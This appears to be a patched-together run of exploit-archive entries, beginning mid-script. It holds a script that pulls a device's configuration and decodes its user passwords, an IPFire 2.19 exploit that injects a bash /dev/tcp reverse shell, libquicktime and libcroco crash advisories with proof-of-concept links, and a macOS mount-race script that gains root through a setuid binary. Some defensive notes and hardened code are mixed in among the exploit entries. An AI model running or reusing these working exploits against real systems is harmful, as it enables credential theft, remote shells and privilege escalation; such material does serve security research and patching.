    for char in rev_pass:
        if char != "124": password = password + pass_dict[char]
    return pass_len, password
if len(sys.argv) < 2:
    print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The web interface's port"
    print "\r\nExample: " + sys.argv[0] + " http://192.168.1.1:8850"
    sys.exit()
elif "http://" not in sys.argv[1] and "https://" not in sys.argv[1]:
    print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The web interface's port"
    sys.exit()

host = sys.argv[1]
print "[+] Getting model name and software version..."
r = requests.get(host + '/cgi-bin/main-cgi?json={"cmd":%20116}')
if r.status_code != 200:
    print "Failed fetching version, got status code: " + str(r.status_code)
    sys.exit()
# the device answers with tab-indented JSON, hence the "\t" in the split markers
print "Model: " + r.text.split('szDevName":\t"')[1].split('",')[0]
print "Software Version: " + r.text.split('szSoftwareVersion":\t"')[1].split('",')[0]
print "\r\n[+] Getting configuration file..."
r = requests.get(host + "/cgi-bin/main-cgi?json={%22cmd%22:255,%22szUserName%22:%22%22,%22u32UserLoginHandle%22:8888888888}")
if r.status_code != 200:
    print "Failed fetching configuration file, response code: " + str(r.status_code)
    sys.exit()
root = xml.etree.ElementTree.fromstring(r.text)
print "[+] Number of users found: " + root.find("UserCfg").get("Num")
print "\r\n[+] Extracting users' hashes and decoding reversible strings:"
users = root.find("UserCfg").getchildren()
print "\r\nUser \t|\t Hash \t|\t Password"
print "_________________________________________________"
for user in users:
    l, p = decode_pass(user.get("RvsblePass"))
    print user.get("UserName"), "\t|\t", user.get("UserPass"), "\t|\t", p
print "\r\n *Note that the users 'default' and 'HAUser' are default and sometimes inaccessible remotely"
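The `pass_dict` table in the script above is, on inspection, a single XOR: every code is the character's ASCII value XORed with 0x7c (`|`), so `'77'` is `'1'` (0x31 ^ 0x7c = 77), `'93'` is `'!'`, `'65'` is `'='`, and the `124` entries the script skips are 0x00 ^ 0x7c, i.e. NUL padding (which is also why the `default` user above decodes to a row of `|` characters: code `0` is `|` ^ `|`). The Python 3 snippet below is added here and is not part of the advisory. It replaces the table with that transform, regenerates the table from it for comparison, parses a configuration fragment of the same shape the script reads (`UserCfg`/`User` elements with `UserName`, `UserPass`, `RvsblePass`), and checks each decoded password against the stored MD5, which the advisory says the login page computes client-side. The XML fragment is constructed for the example and its hashes are the MD5s of the decoded passwords; the 20-character field width is an assumption taken from the sample output above.

```python
import hashlib
import xml.etree.ElementTree as ET

XOR_KEY = 0x7C            # every code in the reversible string is ord(char) ^ 0x7c
PAD_CODE = XOR_KEY        # 0x00 ^ 0x7c = 124: the padding entry the advisory's table skips


def decode_reversible(rev):
    """'29;24;17;21;18;124;124;124' -> 'admin'."""
    codes = [int(c) for c in rev.split(";") if c != ""]
    return "".join(chr(c ^ XOR_KEY) for c in codes if c != PAD_CODE)


def encode_reversible(password, width=20):
    """Inverse transform, padded with 124 up to `width` codes (width assumed)."""
    codes = [ord(ch) ^ XOR_KEY for ch in password]
    codes += [PAD_CODE] * (width - len(codes))
    return ";".join(str(c) for c in codes)


def build_table():
    """Regenerate the advisory's pass_dict (printable ASCII 0x21..0x7e) from the XOR."""
    return {str(o ^ XOR_KEY): chr(o) for o in range(0x21, 0x7F)}


def extract_users(config_xml):
    """Return (user, stored MD5, decoded password, md5_matches) for each <User>."""
    root = ET.fromstring(config_xml)
    out = []
    for user in root.find("UserCfg").findall("User"):
        pwd = decode_reversible(user.get("RvsblePass", ""))
        stored = user.get("UserPass", "").lower()
        matches = hashlib.md5(pwd.encode()).hexdigest() == stored
        out.append((user.get("UserName"), stored, pwd, matches))
    return out


# Constructed sample shaped like the device configuration the script downloads.
SAMPLE_CONFIG = """<Config>
  <UserCfg Num="2">
    <User UserName="admin" UserPass="21232f297a57a5a743894a0e4a801fc3" RvsblePass="29;24;17;21;18;124;124;124"/>
    <User UserName="test" UserPass="098f6bcd4621d373cade4e832627b4f6" RvsblePass="8;25;15;8;124;124;124;124"/>
  </UserCfg>
</Config>"""


if __name__ == "__main__":
    for name, stored, pwd, ok in extract_users(SAMPLE_CONFIG):
        print("%-8s %s %-10s md5 matches: %s" % (name, stored, pwd, ok))
    print(encode_reversible("admin"))
```

The MD5 comparison is the practical check the advisory hints at: when the stored hash equals MD5 of the decoded string, the reversible field is the plaintext and can be typed into the login form; when it does not, the hash itself can still be replayed by replacing the value the page's JavaScript would have computed.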
#
# Title : IPFire 2.19 Firewall Post-Auth RCE
# Date : 09/06/2017
# Author : 0x09AL (https://twitter.com/0x09AL)
# Tested on: IPFire 2.19 (x86_64) - Core Update 110
# Vendor : http://www.ipfire.org/
# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
# Vulnerability Description:
# The file ids.cgi does not sanitize the OINKCODE parameter, which is passed into a system() call that runs wget.
# Valid credentials are needed to exploit this vulnerability, or it can be triggered through CSRF.
#
#
import requests
# Adjust the ip and ports.
revhost = '192.168.56.1'
revport = 1337
url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
username = 'admin'
password = 'admin'
payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'
evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'}
headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'}
def verifyVuln():
    req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed.
    if(req.status_code == 200 and "uid=99(nobody)" in req.text):
        print "[+] IPFire Installation is Vulnerable [+]"
        revShell()
    else:
        print "[+] Not Vulnerable [+]"
def revShell():
    evildata["OINKCODE"] = '`' + payload + '`'
    print "[+] Sending Malicious Payload [+]"
    req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False)
verifyVuln()
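As an added defensive counterpart to the injection described in the header above (example code written for this page, not IPFire's ids.cgi, which is a Perl CGI): the unsafe command-string pattern is shown beside a hardened form that allow-lists the OINKCODE value and launches wget through an argv list with no shell in between. The oinkcode alphabet, the RULES_URL placeholder and the function names are assumptions.

```python
import re
import subprocess
from typing import List

# Allow-list for the parameter. The exact alphabet is an assumption for this
# example; a real check should match what the upstream rules service issues.
OINKCODE_RE = re.compile(r"\A[0-9a-f]{16,64}\Z")

# Placeholder, not the real ruleset location.
RULES_URL = "https://rules.example.invalid/snortrules.tar.gz"


def unsafe_command_line(oinkcode: str) -> str:
    """The pattern the advisory describes: the parameter is spliced into one
    string that is handed to the shell, so backticks, ';', '|' and '$()'
    in it are interpreted as commands instead of as part of the URL."""
    return "wget -O /tmp/rules.tar.gz %s?oinkcode=%s" % (RULES_URL, oinkcode)


def validate_oinkcode(oinkcode: str) -> str:
    """Reject anything outside the expected alphabet before it gets anywhere
    near a process launch. \\A and \\Z also refuse a trailing newline, which
    '$' alone would let through."""
    if not isinstance(oinkcode, str) or not OINKCODE_RE.match(oinkcode):
        raise ValueError("oinkcode rejected: not a plain hex token")
    return oinkcode


def safe_argv(oinkcode: str) -> List[str]:
    """Hardened form: the validated value goes into an argv list. With no
    shell involved there is nothing left to interpret metacharacters."""
    return ["wget", "-O", "/tmp/rules.tar.gz",
            "%s?oinkcode=%s" % (RULES_URL, validate_oinkcode(oinkcode))]


def download_rules(oinkcode: str) -> int:
    """Run the hardened command and return wget's exit status."""
    proc = subprocess.run(safe_argv(oinkcode), shell=False, check=False,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return proc.returncode
```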
libquicktime multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
The libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance the library while providing compatibility with the Quicktime 4 Linux library.
Affected version:
=====
1.2.4
Vulnerability Description:
==========================
##################################
1.
The quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service (infinite loop and CPU consumption) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
POC:
libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
CVE:
CVE-2017-9122
###################################
2.
The lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service (invalid memory read and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
ASAN:SIGSEGV
=================================================================
==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)
==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
#0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)
#1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)
#2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)
#3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14254==ABORTING
debug info:
Program received signal SIGSEGV, Segmentation fault.
...
Stopped reason: SIGSEGV
0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>,
constant=<optimized out>) at lqt_quicktime.c:1242
1242 return
POC:
libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
CVE:
CVE-2017-9123
###################################
3.
The quicktime_match_32 function in util.c in libquicktime 1.2.4 can cause a denial of service (NULL pointer dereference and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
ASAN:SIGSEGV
=================================================================
==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)
==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
#0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)
#1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)
#2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)
#3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)
#4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)
#5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)
#6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)
#7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14359==ABORTING
debug info:
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV
0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>,
_output=<optimized out>) at util.c:874
874	if(input[0] == output[0] &&
POC:
libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
CVE:
CVE-2017-9124
###################################
4.
The lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
=================================================================
==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528
READ of size 4 at 0x602000009cd4 thread T0
#0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242
#1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138
#2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996
#3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration
==40038==ABORTING
POC:
libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
CVE:
CVE-2017-9125
###################################
5.
The quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
=================================================================
==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718
WRITE of size 1 at 0x602000009ce4 thread T0
#0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69
#1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147
#2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56
#3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220
#4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
#5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
#6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
#7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
#8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table
==41637==ABORTING
POC:
libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
CVE:
CVE-2017-9126
###################################
6.
The quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
=================================================================
==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8
WRITE of size 1 at 0x602000009cb1 thread T0
#0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84
#1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557
#2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694
#3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336
#4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231
#5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
#6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
#7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
#8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
#9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom
==41642==ABORTING
POC:
libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
CVE:
CVE-2017-9127
###################################
7.
The quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
=================================================================
==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008
READ of size 4 at 0x602000009d00 thread T0
#0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998
#1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633
#2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891
#3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width
==10979==ABORTING
POC:
libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
CVE:
CVE-2017-9128
=================================
qflb.wu () dbappsecurity com cn
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42148.zip
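Every report in this advisory is triggered by a length or count field read out of a crafted file (the atom sizes walked by quicktime_read_moov, the table allocated in quicktime_read_dref_table, the stts table read by lqt_frame_duration). As an added illustration that is not libquicktime's code, the Python atom walker below shows the defensive check this class of bug calls for: each declared atom size is validated against the enclosing atom before the cursor moves, and a dref entry count is checked against the entries actually present rather than trusted. The container set and the dref layout used here are assumptions made for the example.

```python
import struct
from typing import Iterator, List, Tuple

# Container atoms to descend into; the set mirrors the call chain in the
# stack traces above (moov -> trak -> mdia -> minf -> dinf -> dref).
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"dinf"}


class AtomError(ValueError):
    """Raised instead of reading or writing past what the file actually holds."""


def iter_atoms(buf: bytes, start: int, end: int) -> Iterator[Tuple[bytes, int, int]]:
    """Yield (type, payload_start, payload_end) for the atoms in buf[start:end].
    Each declared size is checked against the enclosing range and always moves
    the cursor forward, so a crafted size of 0 cannot loop forever and a size
    larger than the parent cannot carry a caller past the end of the buffer."""
    pos = start
    while pos < end:
        if end - pos < 8:
            raise AtomError("truncated atom header at offset %d" % pos)
        size, atype = struct.unpack(">I4s", buf[pos:pos + 8])
        hdr = 8
        if size == 1:  # 64-bit "largesize" follows the type field
            if end - pos < 16:
                raise AtomError("truncated largesize at offset %d" % pos)
            size = struct.unpack(">Q", buf[pos + 8:pos + 16])[0]
            hdr = 16
        elif size == 0:  # atom extends to the end of the enclosing range
            size = end - pos
        if size < hdr:
            raise AtomError("size %d smaller than header at offset %d" % (size, pos))
        if size > end - pos:
            raise AtomError("size %d exceeds enclosing atom at offset %d" % (size, pos))
        yield atype, pos + hdr, pos + size
        pos += size


def parse_dref_entries(buf: bytes, start: int, end: int) -> List[Tuple[bytes, bytes]]:
    """Parse a 'dref' payload: 4 bytes version/flags, a 32-bit entry_count, then
    entry_count sub-atoms. The count comes from the file, so it is checked
    against the entries actually present rather than used as-is for allocation."""
    if end - start < 8:
        raise AtomError("dref payload too short for version/flags and entry_count")
    entry_count = struct.unpack(">I", buf[start + 4:start + 8])[0]
    entries = [(atype, buf[ps:pe]) for atype, ps, pe in iter_atoms(buf, start + 8, end)]
    if len(entries) != entry_count:
        raise AtomError("dref declares %d entries, %d present" % (entry_count, len(entries)))
    return entries


def walk(buf: bytes) -> List[Tuple[int, bytes]]:
    """Return (depth, type) for every atom reached, descending into containers
    and validating any dref table found on the way."""
    found: List[Tuple[int, bytes]] = []

    def visit(start: int, end: int, depth: int) -> None:
        for atype, ps, pe in iter_atoms(buf, start, end):
            found.append((depth, atype))
            if atype in CONTAINERS:
                visit(ps, pe, depth + 1)
            elif atype == b"dref":
                parse_dref_entries(buf, ps, pe)

    visit(0, len(buf), 0)
    return found


def atom(atype: bytes, payload: bytes) -> bytes:
    """Build an atom with a 32-bit size header (used to construct sample input)."""
    return struct.pack(">I4s", 8 + len(payload), atype) + payload
```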
libcroco multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Libcroco is a standalone CSS2 parsing and manipulation library.
The parser provides a low-level, event-driven SAC-like API and a CSS object model-like API.
Libcroco provides a CSS2 selection engine and an experimental XML/CSS rendering engine.
Affected version:
=====
0.6.12
Vulnerability Description:
==========================
1.
The cr_tknzr_parse_comment function in cr-tknzr.c in libcroco 0.6.12 can cause a denial of service (memory allocation error) via a crafted CSS file.
./csslint-0.6 --dump-location libcroco_0_6_12_memory_allocation_error.css
==21841==ERROR: AddressSanitizer failed to allocate 0x20002000 (536879104) bytes of LargeMmapAllocator: 12
...
==21841==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
...
#10 0x7fd78c2fcb4d in cr_tknzr_parse_comment /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:462
#11 0x7fd78c2fcb4d in cr_tknzr_get_next_token /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:2218
#12 0x7fd78c356f6e in cr_parser_try_to_skip_spaces_and_comments /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:634
#13 0x7fd78c368a43 in cr_parser_parse_stylesheet /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:2538
#14 0x7fd78c368a43 in cr_parser_parse /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:4381
#15 0x480a8e in sac_parse_and_display_locations /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:960
#16 0x480a8e in main /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:1001
#17 0x7fd78b397f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#18 0x47c95c in _start (/home/a/Downloads/libcroco-0.6.12/csslint/.libs/lt-csslint-0.6+0x47c95c)
Reproducer:
libcroco_0_6_12_memory_allocation_error.css
CVE:
CVE-2017-8834
2.
The cr_parser_parse_selector_core function in cr-parser.c in libcroco 0.6.12 can cause a denial of service (infinite loop and CPU consumption) via a crafted CSS file.
./csslint-0.6 --dump-location libcroco_0_6_12_infinite_loop.css
Reproducer:
libcroco_0_6_12_infinite_loop.css
CVE:
CVE-2017-8871
===============================
qflb.wu () dbappsecurity com cn
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42147.zip
#!/bin/bash
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
if ! security authorize system.volume.internal.mount &>/dev/null; then
    echo >&2 "Cannot acquire system.volume.internal.mount right. This will not work."
    exit 1
fi
TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
    assert(argc == 2);
    setuid(0);
    setgid(0);
    system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1
race_link() {
    mkdir -p mounts
    while true; do
        ln -snf mounts link
        ln -snf $TARGET link
    done
}
race_mount() {
    while ! df -h | grep $TARGET >/dev/null; do
        while df -h | grep $DISK >/dev/null; do
            diskutil umount $DISK &>/dev/null
        done
        while ! df -h | grep $DISK >/dev/null; do
            diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
        done
    done
}
cleanup() {
    echo "Killing child process $PID and cleaning up tmp dir"
    kill -9 $PID
    rm -rf $TMPDIR
}
if df -h | grep $DISK >/dev/null; then
    echo >&2 "$DISK already mounted. Exiting."
    exit 1
fi
race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root
while ! [ -e $TMPDIR/boom ]; do
    sleep 1
done
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"